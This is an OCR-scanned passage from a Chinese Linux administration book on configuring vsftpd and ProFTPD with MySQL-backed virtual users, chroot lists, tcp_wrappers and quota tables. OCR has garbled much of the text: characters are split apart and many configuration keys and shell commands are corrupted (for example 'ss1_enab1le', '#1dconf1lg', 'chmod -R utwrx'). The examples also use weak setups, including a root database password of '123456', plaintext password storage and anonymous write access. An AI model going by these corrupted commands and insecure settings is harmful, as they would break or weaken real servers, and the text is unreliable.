chroot_1ist_file=/ 任 意 指定 的 路 径 /vsftpd.chroot_ list # 指 定 禁 钢 在 家 目录 中 的 用 户 列 表 
文件 路 径 

userlist_enable=yes  # 开 启 userlist 来 限制 用 户 访问 的 功能 

# 如 果 想 限制 某 些 账户 不 能 登录 , 可 以 创建 一 个 名 为 user_1ist 的 文件 , 将 不 准 登录 的 账户 维护 进去 。 
三 行 二 个 三 六 。 

userlist_deny=yes # 名 单 中 的 人 不 允许 访问 ， 非 名 单 中 的 用 户 可 以 受到 另外 一 个 文件 ftpusers 
的 影响 。 其 顺序 是 先 检查 ftpusers 列表 中 的 用 户 ， 如 果 用 户 在 这 个 文件 中 直接 拒绝 访问 ， 如 果 没 有 明确 记 
录 再 检查 userlist 列表 ， 如 果 有 记录 并 且 userlist deny=yes, 则 名 单 中 的 用 户 拒绝 访问 ， 但 如 果 
userlist deny=no; 则 名 单 中 的 用 户 允 许 访问 

userlist deny=no # 人 允许 名 单 中 的 人 访问 

userlist file=/etc/vsftpd/user_1ist# 指 定 用 户 列表 文件 放置 的 路 径 

Idle_session timeout=600 ( 秒 ) # 用 户 会 话 空闲 后 10 分 钟 断 开 

data_connection timeout=120 ( 秒 ) # 将 数据 连接 空闲 2 分 钟 断 开 

accept_timeout=60《〈 秒 ) # 被 动 模式 时 ， 客 户 端 空闲 1 分 钟 后 将 断 开 

connect timeout=60( 秒 ) # 中 断 1 分 钟 后 又 重新 连接 

local max rate=50000 (bite) # 本 地 用 户 传输 率 50K 

anon_max_rate=30000 (bite) # 匿 名 用 户 传 输 率 30K 

pasv_min port=50000 # 将 服务 器 被 动 模式 最 小 端口 设 在 50000 

pasv_max_port=50010 “+# 将 服务 器 被 动 模式 最 大 端口 改 在 50010 

pasv_enable=yeslno # 是 否 将 服务 器 设 定 为 被 动 模式 。 我 试 过 设置 此 项 为 YES， 但 客户 机 以 主动 模 
式 还 是 可 以 访问 

max_clients=200 #FTP 的 最 大 连接 数 

max_per ip=4  # 每 IP 的 最 大 连接 数 

listen_port=2121 # 从 2121 端口 进行 数据 连接 
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dirmessage_enable=YES# 如 何 定制 欢迎 信息 ， 也 就 是 我 们 登录 有 些 FTP 之 后 ， 会 出 现 类 似 : 欢迎 
您 来 到 Linuxsir FTP， 在 这 里 ， 您 会 得 到 最 真诚 的 帮助 ， 如 果 有 什么 问题 和 建议 ， 请 来 信 ， 多 谢 

message_file=.message# 然 后 我 们 制定 一 个 .message 文件 在 登录 的 目录 下 , 写 上 您 想 要 写 的 东西 

user config dir=/etc/vsftpd/userconf ## 定 义 用 户 配置 文件 的 目录 

virtual_use_ local _privs=# 当 该 参数 激活 (YES) 时 ， 虚 拟 用户 使 用 与 本 地 用 户 相同 的 权限 。 所 
有 虚拟 用 户 的 权限 使 用 local 参数 。 当 此 参数 关闭 (No) 时 ， 虚 拟 用 户 使 用 与 匿名 用 户 相同 的 权限 ， 所 有 
虚拟 用 户 的 权限 使 用 anon 参数 。 这 两 种 做 法 相 比 ， 后 者 更 加 严格 一 些 ， 特 别 是 在 有 写 访问 的 情形 下 。 默 认 
情况 下 此 参数 是 关闭 的 (NO) 

ls_recurse_enable= 是 否 可 以 使 用 1s -R 命令。 默认 为 关闭 

use_localtime= 是 否 使 用 本 机 时 间 ， 若 设 定 为 no， 则 使 用 格林 威 治 时 间 。 由 于 我 国 与 格林 威 治 有 8 
小 时 时 差 ， 所 以 建立 设 定 为 yes 

hide_ ids=  # 是 否 隐藏 文件 的 所 有 组 和 用 户 信息 

secure_chroot_dir=/usr/share/empty # 这 选项 指向 一 个 空 目录 , 并 且 ftp 用 户 对 此 目录 无 写 
权限 。 当 vsftpd 不 需要 访问 文件 系统 时 ， 这 个 目录 将 被 作为 一 个 安全 的 容器 ， 用 户 将 被 限制 在 此 目录 中 默 
认 目 录 为 /usr/share/empty 

ss1_enab1le= 

allow anon ssl= 

force local data ssl= 

force local logins ssl= 

ssl tlsvl= 

ssl_sslv2=  # 是 否 对 SSL 版 本 1 支持 版 本 2 

ssl_sslv3=  # 是 否 对 SsL 版 本 1 支持 版 本 3 


rsa cert file=/etc/vsftpd/vsftpd.pem 


3. 应 用 : VSFTP 与 MySQL 结合 ， 用 MySQL 增加 与 管理 访问 虚拟 的 用 户 ， 配 置 过 程 应 
如 何 操作 ? 


(1) 设置 VSFTPd 配置 文件 
在 vsftpd.conf 文件 中 ， 加 入 以 下 选项 : 


guest enable=YES 
guest username=vuser 


pam service name=ftp 
(2) 创建 用 户 表 


#mysql -u root -p'passwOrd' 
mysql>create database vuser; 
mysql>use vuser; 
mysql>create table users(name char(16) binary,passwd char (16) binary); 


mysql>quit 


(3) 设置 MySQL 的 PAM 验证 
MySQL 进行 PAM 验证 的 开源 项 目 (http://sourceforge.net/projects/pam-mysql/) 。 首 先 从 


FTP 服务 器 的 安全 配置 案例 第 6 党 


网 站 下 载 它 的 程序 包 pam_myql-0.5.tar.gz， 复 制 到 /root 目录 中 。 在 编译 安装 之 前 ， 要 确保 
mysql-devel 的 RPM 包 已 经 安装 在 你 的 机 器 上 ， 如 果 没 有 请 从 RHL 安装 光盘 中 安装 该 包 。 然 
后 ， 执 行 以 下 命令 : 


#tar xvzf pam mysql-0.5.tar.gz 
#cd pam mysql 
#make && make install 


make install 这 一 步 可 能 会 出 现 错误 ,这 种 情况 下 只 好 手动 将 该 目录 下 生成 的 pam_mysql.so 
复制 到 /lib/security 目录 下 。 
接 下 来 , 我们 要 设置 VSFTPd 的 PAM 验证 文件 。 打开/etc/pam.d/ftp 文件 ， 加 入 以 下 内 容 : 


auth required pam mysql.so user=root passwd=passw0rd host=localhost db=vuser 
table=users 

usercolumn=name passwdcolumn=passwd crypt=2 

account required pam mysql.so user=root passwd=passw0rd host=localhost 
db=vuser 


table=users usercolumn=name passwdcolumn=passwd crypt=2 


上 面 涉及 到 的 参数 , 只 要 对 应 前 面 数据 库 的 设置 就 可 以 明白 它们 的 含义 。 这 里 需要 说 明 的 
是 crypt 参数 。crypt 表示 口令 字段 中 口令 的 加 密 方式 : crypt=0, 口令 以 明文 方式 (不 加 密 ) 保 
存在 数据 库 中 ;crypt=1, 口令 使 用 UNIX 系统 的 DES 加密 方式 加 密 后 保存 在 数据 库 中 ;crypt=2， 
口令 经 过 MySQL 的 password0 函 数 加 密 后 保存 。 

其 余 配 置 可 以 和 虚拟 用 户 配置 一 样 , 就 是 使 用 pam-mysql 来 进行 虚拟 用 户 的 用 户 添加 , 比 
较 简单 。 


4. 应 用 : 如 何 设置 vsftpd 使 之 可 以 将 特定 用 户 限制 在 特定 的 目录 内 ? 

@ 方法 1: adduser -d 目录 用 户 名 ， 在 /etc/vsftpd/vsftpd.conf 中 加 入 chroot local user = 
YES ( 茜 钢 所 有 用 户 的 目录 为 属 主 目录 )。 

@ 方法 2:adduser -d 目录 用 户 名 .修改 /etc/vsftpd/vsftpd.conf 中 的 chroot list_enable=YES 
chroot_list_file=/etc/vsftpd.chroot_list ( vsftpd.chroot_list 文件 内 写 入 的 用 户 就 限 禁 铀 用 
户 的 目录 为 属 主 目录 )，vi/etc/vsftpd.chroot list 加 入 你 要 限制 的 用 户 的 用 户 名 称 即 可 。 


5. 应 用 : 在 vsftpd 中 怎么 限制 IP 地 址 。 上 比如 只 要 某 个 IP 访问 FTP Server 应 该 怎么 配置 ? 


首先 使 用 Vsftpdttcp_wrappers 控制 主机 和 用 户 访问 tcp-wrappers 的 执行 顺序 : 先 执行 
hosts.allow, 如 果 hosts.allow 里 面 有 名 单 , 则 允许 名 单 内 的 主机 访问 ; 否则 ,向 下 寻找 hosts.deny， 
如 果 hosts.deny 里 面 有 名 单 ， 则 拒绝 名 单 内 的 主机 访问 ， 如 果 也 没有 〈 即 allow 和 deny 里 面 都 
没有 名 单 ) 则 允许 该 主机 访问 。 在 主机 〈192.168.1.102) 上 配置 vsftpd 服务 ， 使 得 除了 
192.168.1.100 以 外 允许 192.168.1.0/24 网 段 的 其 他 主机 访问 此 FTP 服务 ， 示 例 代 码 如 下 : 


#vi/etc/hosts.allow 


Linux ”企业 应 用 案例 精 解 


vsftpd:192.168.1.100:DENY 
Mottoor lo lols 


最 后 重启 vsftpd 即 可 。 


6. 应 用 : 让 vsftp 默认 路 径 是 pub， 怎 么 让 默认 路 径 改 为 根 目录 ? 
首先 在 vsftpd.conf 中 加 入 anon_root=/var/www， 男 外 检查 一 下 权限 ， 然 后 重启 vsftpd: 


chroot list enable=YES 
chroot list file=/etc/vsftpd.chroot list (vsftpd.chroot list 文件 内 写 入 的 用 户 


就 禁 铀 用 户 的 目录 为 属 主 目录 ) 


注意 一 个 问题 ， 当 vsftp 客户 端 是 Windows 系列 操作 系统 ， 如 何 解决 客户 端 乱码 问题 ? 
对 于 这 类 问题 主要 还 是 编码 问题 ， 首 先 修改 Linux 编码 为 Windows 的 编码 ， 方 法 如 下 。 


加 修改 /etc/sysconfig/il8n 内 容 为 : 


LANG="zh_CN.GB2312" 
SUPPORTED="zh_CN.GB2312" 


加 执行 下 列 两 条 命令 : 


export LANG=zh_CN.GB2312 
export LC_ ALL=zh CN.GB2312 


6.2 Linux 下 VSFTPD 和 ProFTPD 用 户 集中 管理 


FTP 服务 是 互联 网 上 比较 古老 的 一 种 应 用 , 至 今 仍 有 顽强 的 生命 力 , 但 令 管理 员 头 痛 不 已 


的 是 其 用 户 管理 ， 既 多 且 杂 ， 如 何 解决 这 一 问题 呢 ? 使 用 MySQL 与 ProFTPD 或 VSFTPD 软 


件 结 


易 ] 


告 合 可 以 搭建 一 个 高 效 、 稳 定 且 集中 管理 的 FTP 服务 器 。 本 节 就 来 介绍 一 下 如 何 搭建 一 个 


FF 管理 的 基于 MySQL 数据 库 的 FTP 服务 器 。 
搭建 基于 数据 库 的 FTP 服务 器 时 首先 要 选择 合适 的 软件 。 下 面 就 是 所 选 软件 的 详细 信息 。 
@ Linux 版 本 : RHEL5。 

MySQL 版 本 : MySQL-standard-5.0.21-1.rhel4.src.rpm。 

FTP 服务 器 : proftpd-1.3.0.tar.gz 和 vsftpd-2.0.4.tar.gz。 

MySQL 的 PAM 验证 程序 : pam mysql-0.7RC1 .tar.gz。 


需要 说 明 的 是 ，RHELS5 自 定义 安装 时 ，“development tools” 项 必须 选择 ， 否 则 编译 调试 


软件 时 需要 的 软件 包 需 另行 安装 ， 其 次 ， 要 确保 所 安装 Linux 系统 时 没有 安装 MySQL 与 FTP 
服务 器 等 软件 ， 如 果 有 则 先 印 载 ; 再 次 ，ProFTPD 与 VSFTPD 两 者 不 要 在 同 台 计 算 机 中 同时 
使 用 ， 这 样 会 造成 意 想不到 的 问题 ， 读 者 可 根据 自己 的 需求 和 软件 的 具体 功能 选择 其 中 之 一 。 
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6.2.1 建立 程序 安装 目录 
整个 安装 过 程 以 root 用 户 身份 执行 ， 首 先 执行 如 下 命令 : 


#cd /soft/programe 
#mkdir mysql 


需要 注意 目录 名 称 的 大 小 写 : 


#mkdir proftpd 


#mkdir pam mods 
MySQL 的 安装 目录 为 /soft/program/mysql，ProFTPD 的 安装 目录 为 /soft/program/proftpd， 


pam_mysql.so 的 安装 目录 为 /sofVprogram/pam_mods，/storage 是 一 个 已 经 存在 的 目录 ,所 有 的 
FTP 用 户 上 传 和 下 载 文件 都 存放 在 这 里 


6.2.2 安装 MySQL 
@ 增加 一 个 管理 MySQL 的 用 户 和 组 ， 命 令 如 下 : 


#groupadd mysqlgrp 
#useradd -g mysqlgrp mysqladm 
#passwd mysqladm 


@ 切换 到 MySQL-stan-dard-5.0.21-1.thel4.src.rpm 文件 所 在 的 目录 ， 执 行 以 下 命令 进行 安装 : 
#rpm-ivh MySQL-stan-dard-5.0.21-1.rhel4.src.rpm 
此 命令 用 于 解压 出 mysql-5.0.21.tar.gz 文件 并 存放 在 以 下 的 目录 中 : 


#cd /usr/src/redhat/SsOURCE 

#tar zxvf mysql-5.0.21.tar.gz 

#cd mysql-5.0.21 

#./configure prefix=/soft/program/mysql --with-extra-charsets=all 

其 中 ，“ prefix=/soft/program/mysql ”参数 用 来 指定 MySQL 的 安装 目录 ， 
“--with-extra-charsets=all” 用 来 支持 所 有 的 字符 集 。 


#make 


#make install 


@ 初始 化 数据 库 的 命令 如 下 : 


#cd /soft/program/mysql/bin 
#./mysql install db 


@ 为 了 安全 应 修改 数据 库存 放 目录 的 信息 和 访问 模式 (/soft/program/mysqll/var 为 数据 库 
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存放 的 默认 目录 ) ， 命 令 如 下 : 


#cd /soft/program/mysql 
#chown -R mysqladm:mysqlgrp Var 


#chmod -R go-wrx var 
@ 修改 配置 文件 的 命令 如 下 : 


#cd /soft/program/mysql/share/mysql 
#cp my-small.cnf /etc/my.cnf 
#cd /etc 


在 my.cnf 文件 中 ， 增 加 如 下 内 容 : 


[mysql] 

user=mysqladm # 表 示 用 mysqladm 用 户 启动 MysQL# 

default-character-set=utf8 # 表 示 使 用 UTE-8 字符 集 ， 此 种 字符 集 的 通用 性 较 好 ， 支持 中 文 ， 
当然 也 可 以 直接 使 用 GBK 

[clent] 

Default-character-set=utf8 


@ 启动 MySQL。 启 动 方式 有 两 种 ， 一 种 是 手动 启动 ， 另 一 种 是 自动 启动 ， 其 中 手动 启 
动 的 操作 如 下 : 


#cd /soft/program/mysql/bin 
#./mysqld safeg& 


自动 启动 则 需要 在 /etc/re.d/re/local 中 加 入 以 下 的 内 容 ,开机 后 能 自动 启动 MySQL 数据库: 


if [-x /soft/program/mysql/bin/mysqld safe]; then 
install path name /bin/mysqld safeg& 
中 


@ 修改 管理 员 密 码 。 
使 用 如 下 命令 修改 数据 库 密码 : 


#cd /soft/program/mysql/bin 
#./mysqladmin -h localhost -u root password !123456" 


上 述 命令 的 意思 是 本 机 上 (〈-h host) 使 用 的 管理 数据 库 的 默认 管理 账号 为 root。 需 要 注意 
的 是 ， 此 root 并 非 Linux 系统 中 的 root 用 户 ， 密 码 设置 为 123456。 


6.2.3 安装 ProFTPD 


下 载 地 址 : ftp://ftp.proftpd.org/distrib/source。 
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@ 切换 到 proftpd-1.3.0.tar.gz 文件 所 在 的 目录 ， 执 行 以 下 步骤 操作 : 


#tar zxvf proftpd-1.3.0.tar.gz 
#cd proftpd-1.3.0 
#./configure--prefix=/soft/program/proftpd 
--with-modules=mod sql:mod sql mysql: 
mod quotatab:mod quotatab sql 


--with-modules 参数 用 于 支持 将 MySQL 和 Quota 模块 添加 进来 .如 下 参数 指定 MySQL 中 
include 的 目录 路 径 : 


--with-includes=/soft/program/mysql/include/mysql 
如 下 参数 指定 MySQL 中 lib 的 目录 路 径 : 
—-with-libraries=/soft/program/mysql/lib/mysql 

接 下 来 再 执行 make 命令 ， 完 成 安装 : 


#make 


#make install 


使 用 如 下 命令 建立 一 个 用 于 管理 ProFTPD 的 Linux 系统 账号 和 组 : 


#groupadd -g 2009 ftpgroup 

#useradd -u 2009 -s /bin/false -d /storage -g ftpgroup ftpuser 
#chown -R ftpuser.ftpgroup /storage 

#chmod -R go-wrx- /storage 


#chmod -R utwrx /storage 

简单 修改 ProFTPD 配置 文件 ， 使 之 正常 运行 : 
#cd /soft/program/proftpd/etc 

利用 编辑 器 打开 proftpd.conf， 修 改 以 下 内 容 : 


#Set the user and group under which the server will run. 
User ftpuser 


Group ftpgroup 
@ 启动 ProFTPD。 
启动 ProFTPD 同样 有 两 种 方法 ， 即 手动 启动 和 自动 启动 ， 其 中 手动 启动 的 操作 如 下 : 


#cd /soft/program/proftpd/sbin/ 
#./proftpd 


此 时 一 个 基本 的 FTP 服务 器 已 经 搭建 完成 ， 可 以 进行 测试 了 。 需 要 注意 的 是 ， 启 动 时 如 
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果 出 现 以 下 信息 ， 则 表明 运行 时 出 现 了 错误 : 


error while loading shared libraries:libmysqlclient.so.15:cannot open shared 


object file:No such file or directory 
通常 的 解决 办 法 如 下 : 
#cd /etc 
利用 文本 工具 打开 ld.so.conf， 添 加 以 下 的 内 容 /soft/program/mysql/lib/mysql: 
#1dconf1lg 


更 新 ld.so cache file。 
要 让 ProFTPD 自动 启动 可 在 /etc/re.d/re.local 中 加 入 以 下 的 内 容 : 


/soft/program/proftpd/sbin/proftpd 


6.2.4 MySQL 与 ProFTPD 组 合 


MySQL 可 以 与 ProFTPD 完美 结合 。 在 MySQL 中 建立 一 个 名 为 ftp 的 数据 库 ， 在 该 数据 
库 中 建立 以 下 4 个 表 : 


Q 登录 FTP 服务 器 的 用 户 表 ftpusers， 字 段 信息 如 下 所 示 〈 这 些 字 段 是 必须 的 ， 其 他 字 
段 可 根据 自己 的 需要 添加 ) : 


"userid' text NOT NULL # 用 户 登录 账号 # 

"passwd' text NOT NULL # 用 户 登录 密码 # 

"uid' int(11)NOT NULL default '2009'， # 与 LIinux 系统 账号 ftpuser 的 UID 号 一 致 # 
"gid' int(11)NOT NULL default '!2009!， # 与 Linux 系统 组 # 


@ FTP 用 户 归 属 表 ftpgroups， 字 段 信息 如 下 所 示 ， 关 于 建立 该 组 的 目的 将 在 quotalimits 
表 中 说 明 : 


'groupname' text NOT NULL 间 组 名 # 
"gid' smallint (6) NOT NULL default'0'，# 组 的 id 号 # 
'memembers' text NOT NULL # 成 员 # 


@ 用 于 设置 磁盘 限额 相关 信息 的 表 quotalimits 和 quotatallies， 这 两 个 表 的 字段 请 不 要 更 
它 是 与 ProFTPD 的 配置 文件 紧密 联系 的 ，quotalimits 表 的 字段 信息 如 下 : 


县 


'name' varchar(30)default NULL, 

"'quota type' enum('user'v 'group'v 'class','all')NOT NULL default "user'v 
"per_session' enum('false','true')NOT NULL default'false', 

"limit type' enum('soft','hard')NOT NULL default'soft', 

'bytes in avail'float NOT NULL default'0', 
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'bytes out avail'float NOT NULL default'0', 
'bytes xfer avail'float NOT NULL default'0', 
'files in avail'"'int(10) unsigned NOT NULL default'0', 
"files out avail'int(10)unsigned NOT NULL default'0', 
'files xfer avail'int(10)unsigned NOT NULL default'0' 


需要 注意 的 是 ，name 应 该 这 样 理解 ， 既 能 表示 单个 用 户 ， 也 能 表示 用 户 组 名 。 如 果 在 
quota type《〈 限 额 类 型 ) 中 使 用 group 来 认证 的 话 ， 那 就 要 在 这 里 设置 组 名 ， 这 样 整 组 都 具有 
统一 的 磁盘 限额 的 特性 ， 当 然 要 在 ftpgroups 表 中 插入 组 记录 ， 并 且 在 member 字段 中 把 用 户 
一 个 一 个 的 列 进去 。 默 认 值 可 以 为 室 NULL。 如 果 为 空 ， 则 针对 quota_type 中 设置 的 类 型 ， 如 
在 quota_ type 中 设置 为 user， 就 是 针对 所 有 ftpusers 中 的 用 户 起 作用 ， 如 果 是 group 名 ， 则 对 
ftpgroups 所 有 组 起 作用 。quota_type 为 磁盘 限额 类 型 ， 可 以 设置 为 用 户 ， 也 可 以 设置 为 用 户 组 
group。 如 果 name 写 的 是 用 户 组 ， 这 里 就 设置 为 group 来 认定 。 默 认为 user 认证 。per_session 
默认 为 false，limit type 默认 为 soft。Bytes_in_avail 为 用 户 占用 空间 大 小 ， 也 就 是 FTP 的 用 户 
空间 容量 ， 单 位 是 byte， 默 认为 0，0 是 不 受 限 制 。bytes_out_avail 为 所 有 下 载 文件 的 总 和 ， 
默认 为 0。 

bytes_xfer_avail 为 一 个 用 户 上 传 下 载 流 量 的 总 和 ， 默 认为 0。files_in_avail 为 限制 上 传 文 
件 总 和 ， 默 认为 0。files_out_avail 为 限制 下 载 文件 的 个 数 总 计 ， 默 认为 0。files_xfer avail 为 
允许 下 载 和 上 传 的 文件 总 和 ， 默 认为 0。Quotatallies 为 表 的 字段 信息 ， 各 字段 的 信息 参照 
quotalimits。 配 置 参考 参数 如 下 : 


name VARCHAR(30)NOT NULL, 

quota type ENUM("user","group", "class","all")NOT NULL, 
bytes_in used FLOAT NOT NULL, 

bytes_ out used FLOAT NOT NULL, 

bytes xfer used FLOAT NOT NULL, 

files_in used INT UNSIGNED NOT NULL, 

files out used INT UNSIGNED NOT NULL, 

files xfer used INT UNSIGNED NOT NULL 


此 外 ， 在 proftpd.conf 文件 中 增加 以 下 的 内 容 。 


@ 数据 库 连 接 的 信息 : ftp 是 数据 库 名 , localhost 是 主机 名 , root 是 连接 数据 库 的 用 户 名 ， 
123456 是 密码 。 


SQLConnectlnfoftp@localhost root 123456 

@ 数据 库 认证 的 类 型 : Plaintext 表示 明文 认证 方式 。 
SQLAuthTYpes Backend Plaintext 

@ 指定 用 来 做 用 户 认证 的 表 的 相关 信息 : 


SALUserlnfo ftpusers userid passwd uid gid homedir shell 
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SQLGrouplnfo ftpgroups groupname gid members 

@ 校 验 数据 表 : 

SQLRAuthenticate users groups usersetfast groupsetfast 

@ 如 果 home 目录 不 存在 ， 则 系统 会 根据 ftpusers 表 中 的 home 字段 新 建 一 个 目录 : 
SQLHomedironDemand on 

@ 打开 磁盘 限额 引擎 : 

QuotaEngine on 

@ 设置 磁盘 限额 ;: 

QuotaDirectoryTally on 

@ 设置 磁盘 容量 显示 时 的 单位 : 

QuotaDisplayUnits Mb 

@ 设置 磁盘 限额 的 日 志文 件 : 

QuotaLog”/usr/local/proftpd/var/quota” 

@ 显示 磁盘 限额 信息 ，ftp 登录 后 可 执行 quote site quota 命令 查看 当前 磁盘 的 使 用 情况 : 
QuotashowQuotas on 

@ 设置 磁盘 的 限额 日 志文 件 : 

QuotaLog”/var/log/quota” 

@ 指定 磁盘 限额 模块 使 用 的 数据 库 信 息 : 


SQLNamedQuer get-quota-limit SELECT "name,quota type,bytes in avail, 
bytes out avail,bytes xfer avail,files in avail,files out avail,files xfer ava 
il FROM quotalimits WHERE name="'%{0}'AND quota type="'%{1}'" 

SQLNamedQuery get-quota-tally SELECT"name,quota type,bytes in used, 
bytes_ out used,bytes xfer used,files in used,files out used,filed xfer used,FR 
OM quotatallies WHERE name="'%${0}'AND quota type ="'%{1}" 

SQLNamedQuery update-quota-tally UPDATE"bytes in used =bytes in used+%{0}, 
bytes_ out used=bytes out used+%{1},bytes xfer used=bytes xfer used+%{2},files_ 
in used=files in used+%{3},files out used=files out used+%{4},files xfer used 
=files xfer used+%{5} WHERE name='%{6}'AND quota type = '%{7}'" quotatallies 

SQLNamedQuery insert-quota-tally INSERT"%{0},%{1},%{2},%{3},%{4},%{5},%{6}, 
$${7}"quotatallies 

QuotaLimitTable sql:/get-quota-limit 
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QuotaTallyTable sql:/get-quota-tally/update-quota-tally/insert-quota-tally 


另外 ， 读 者 还 可 以 在 proftpd.conf 中 添加 一 些 有 关 超 时 、 限 制 连接 次 数 、 加 快 连接 速度 、 
支持 断 点 传输 及 安全 传输 等 内 容 。 


6.2.5 VSFTPD 与 MySQL 的 组 合 


(1) 安装 和 启动 VSFTPD 
安装 前 需要 注意 的 是 ，VSFTPD 默认 配置 中 需要 “nobody” 用 户 ， 故 应 确保 Linux 系统 中 
有 该 用 户 。VSFTPD 默认 配置 中 需要 “/usr/share/empty” 目 录 ， 确 保 Linux 系统 中 有 此 目录 。 
VSFTPD 提供 匿名 FTP 服务 时 ， 需 要 ftp 用 户 和 一 个 有 效 的 匿名 目录 /varftp， 使 用 下 列 命 
令 建 立 用 户 、 目 录 和 目录 的 相关 安全 设置 。 匿名 目录 也 可 以 改 成 自己 喜欢 的 目录 并 使 匿名 用 户 
具有 读 写 权限 。 


#useradd -d /var/ftp ftp 
#chown root.root /var/ftp 


#chmod og-w/var/ftp 
中 切换 到 vsftpd-2.0.4.tar.gz 文件 所 在 的 目录 ， 执 行 以 下 操作 : 


#tar zxvf vsftpd-2.0.4.tar.g 
#cd vsftpd-2.0.4 
#make 


#make install 


请 将 vsftpd-2.0.4 目录 中 已 编译 好 的 二 进 制 文件 、 手 册 等 复制 到 相应 目录 〈 如 果 该 目录 中 
没有 以 下 的 文件 ) : 


#cp vsftpd /usr/local/sbin/vsftpd 
#cp vsftpd.conf /etc 
#cp RedHat/vsftpd.pam /etc/pam.d/ftp 


以 下 两 步 是 复制 手册 ， 也 可 以 不 复制 。 


#cp vsftpd.conf.5 /usr/local/share/man/man5 
#cp vsftpd.8 /usr/local/share/man/man8 


@ 以 standalone 模式 运行 VSFTPD， 在 /etc/vsftpd.conf 添加 以 下 内 容 : 
Listen=YES 


此 参数 行 表示 以 独立 方式 启动 VSFTPD 进程 。 此 时 匿名 用 户 已 经 可 以 登录 ， 如 果 想 要 提 
供 系 统 用 户 登 录 ， 应 把 下 面 两 行 的 注释 去 掉 ， 系 统 用 户 的 目录 就 是 建立 账号 时 设 定 的 目录 : 


Local enable=YES 
Write enable=YES 
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@ 启动 VSFTPD: 


#cd /usr/local/sbin 
#./vsftpdg 
现在 可 以 进行 测试 了 。 


(2) 配置 支持 MySQL 的 VSFTPD 
首先 需要 建立 一 个 虚拟 用 户 对 应 的 Linux 系统 账号 ， 可 以 使 用 如 下 命令 来 完成 : 


#useradd -s /bin/false -d/storage ftpuser 
#passwd ftpuser 

#chown -R ftpuser.ftpgroup /storage 
#chmod -R go-wrx /storage 


#chmod -R utwrx /storage 


@ 数据 库 表 ftpusers 的 字段 信息 如 下 : 


'userid' text NOT NULL # 用 户 登 录 账 号 # 
'passwd' text NOT NULL # 用 户 登 录 密 码 # 


需要 注意 的 是 ， 数 据 库 中 必须 授权 ftpuser 用 户 可 以 读 FTP 数据 库 的 ftpusers 表 ， 授 权 这 
一 步 一 定 要 正 设置 确 。 


@ 安装 MySQL 的 PAM 验证 程序 : 


#tar zvxf pam mysql-0.7RC1.tar.gz 

#cd pam mysql-0.7RC1 

#./configure --with-mysql=/soft/program/mysql 
--with-pam-mods-dir=/soft/program/pam mods 


上 述 参数 行 用 来 指定 pam_mysql.so 文件 存放 的 目录 。 
--with-openssl 
使 用 上 述 参数 行 后 可 以 避免 make 时 报 有 关 md5.h 的 编译 错误 。 


#make 


#make install 
@ 修改 /etc/vsftpd.conf， 打 开 或 更 改 以 下 几 项 : 


anonymous enable=YES 
local enable=YES 
guest enable=YES 


guest username=ftpuser 


打开 这 个 参数 后 便 允 许 进行 虚拟 用 户 的 上 传 文件 、 建 立 目录 等 操作 : 
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write enable=YES 

anon_ upload enable=YES 

anon mkdir write enable=YES 
anon other write enable=YES 
ascll upload enable=YES 
ascll download enable=YES 


VSFTPD 配置 文件 中 还 可 以 进行 更 多 的 设置 ,如 磁盘 配额 、 虚 拟 用 户 个 人 目录 的 建立 、 性 
能 与 负载 控制 、FTP 被 动 模式 的 断口 设置 、 安 全 设置 等 ， 读 者 可 根据 自己 的 需要 进行 完善 。 


@ 编辑 文件 
在 /etc/pam.d/ftp 中 去 掉 其 他 的 内 容 ， 添 加 以 下 的 内 容 : 


#auth 

auth required/soft/program/pam mods/pam mysql.so 

user=ftpuser passwd=6789host=localhost db=ftp 

table=ftpusers usercolumn=userid passwdcolumn=passwd crypt=0 

#account 

Account required/soft/program/pam mods/pam mysql.so 

User=ftpuser passwd=6789 host=localhost db=ftp table=ftpusers usercolumn= 


userid passwdcolumn=passwd crypt=0 


涉及 到 的 参数 ， 只 要 对 应 前 面 数据 库 的 设置 就 可 以 明白 它们 的 含义 。 其 中 : “crypt=0” 
表示 口令 以 明文 方式 (不 加 密 ) 保存 在 数据 库 中 ，“crypt=1” 表 示 口 令 使 用 Unix 系统 的 DES 
加 密 方 式 ， 加 密 后 保存 在 数据 库 中 ; “crypt=2” 表 示 口 令 经 过 MySQL 的 password0) 函 数 加 密 
后 保存 。FTP 数据 库 中 ftpusers 表 的 授权 用 户 ftpusers 和 密码 必须 正确 设置 。 


6.2.6 ”开机 自动 启动 VSFTPD 


请 将 vsftpd-2.0.4/xinetd.d/vsftpd 文件 复制 到 /etc/xinetd.d/ 中 (如 果 目 录 中 没有 该 文件 ) 。 此 
还 需 设置 vsftpd.conf 中 的 listen 和 Tcp_Wrappers 参数 , 将 其 都 设置 为 NO, 最 后 利用 ntsysv 
， 选 中 VSFTPD 守护 进程 即 可 。 
通过 上 面 的 知识 ,结合 Apache、PHP 等 软件 可 以 开发 许多 功能 ， 如 自动 申请 主页 空间 等 
而 且 使 用 phpMyAdmin 可 以 以 Web 方式 管理 MySQL 很 容易 添加 和 删除 用 户 ， 这 样 FTP 用 户 
管理 就 轻松 多 了 。 


6.3 在 VSFTPD 中 实现 对 IP 的 安全 管理 案例 


Linux 下 的 FTP 服务 器 软件 很 多 ,常见 的 有 Wu-FTP,，ProFTPD,，PureFTPD，VSFTPD 等 。 
但 是 如 果 要 问 哪 种 服务 器 最 安全 ， 首 推 的 应 该 就 是 VSFTPD。 顾 名 思 义 ，VSFTPD 设计 的 出 发 
点 就 是 安全 性 。 随 着 版 本 的 不 断 升级 ，VSFTPD 在 性 能 和 稳定 性 上 也 取得 了 极 大 的 进展 。 如 
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Red Hat、SUSE、Debian、GNU、GNOME、KDE 等 一 些 大 型 站 点 都 采用 VSFTPD 作为 它们 的 
FTP 服务 器 。 可 见 ，VSFTPD 本 身 自 带 的 功能 有 多 么 强大 。 


6.3.1 项 目 背景 


某 一 VSFTPD 服务 器 做 影视 下 载 服务 ,工作 在 standalone 模式 下 ,为 了 安全 起 见 , 用 户 均 
配置 为 虚拟 用 户 ， 共 有 两 个 虚拟 账号 ， 一 个 账号 是 超级 用 户 〈admin) ， 另 一 个 账号 是 普通 用 
户 (movie) 。 超 级 用 户 是 管理 员 使 用 的 账号 ， 用 于 上 传 与 管理 影片 ， 所 以 没有 特别 的 限制 。 
普通 用 户 账 号 用 于 给 用 户 提供 影视 下 载 服务 。 出 于 安全 方面 的 考虑 ， 需 要 做 如 下 限制 : 不 允许 
上 传 ， 只 允许 下 载 ， 下 载 速率 限制 在 S00ks， 而 且 只 能 单线 程 下 载 ， 如 果 有 用 户 使 用 多 线程 工 
具 下 载 ， 就 要 对 该 卫 进行 封禁 5 分 钟 的 处 理 ，5 分 钟 后 自动 解 封 。 


6.3.2 ”准备 工作 


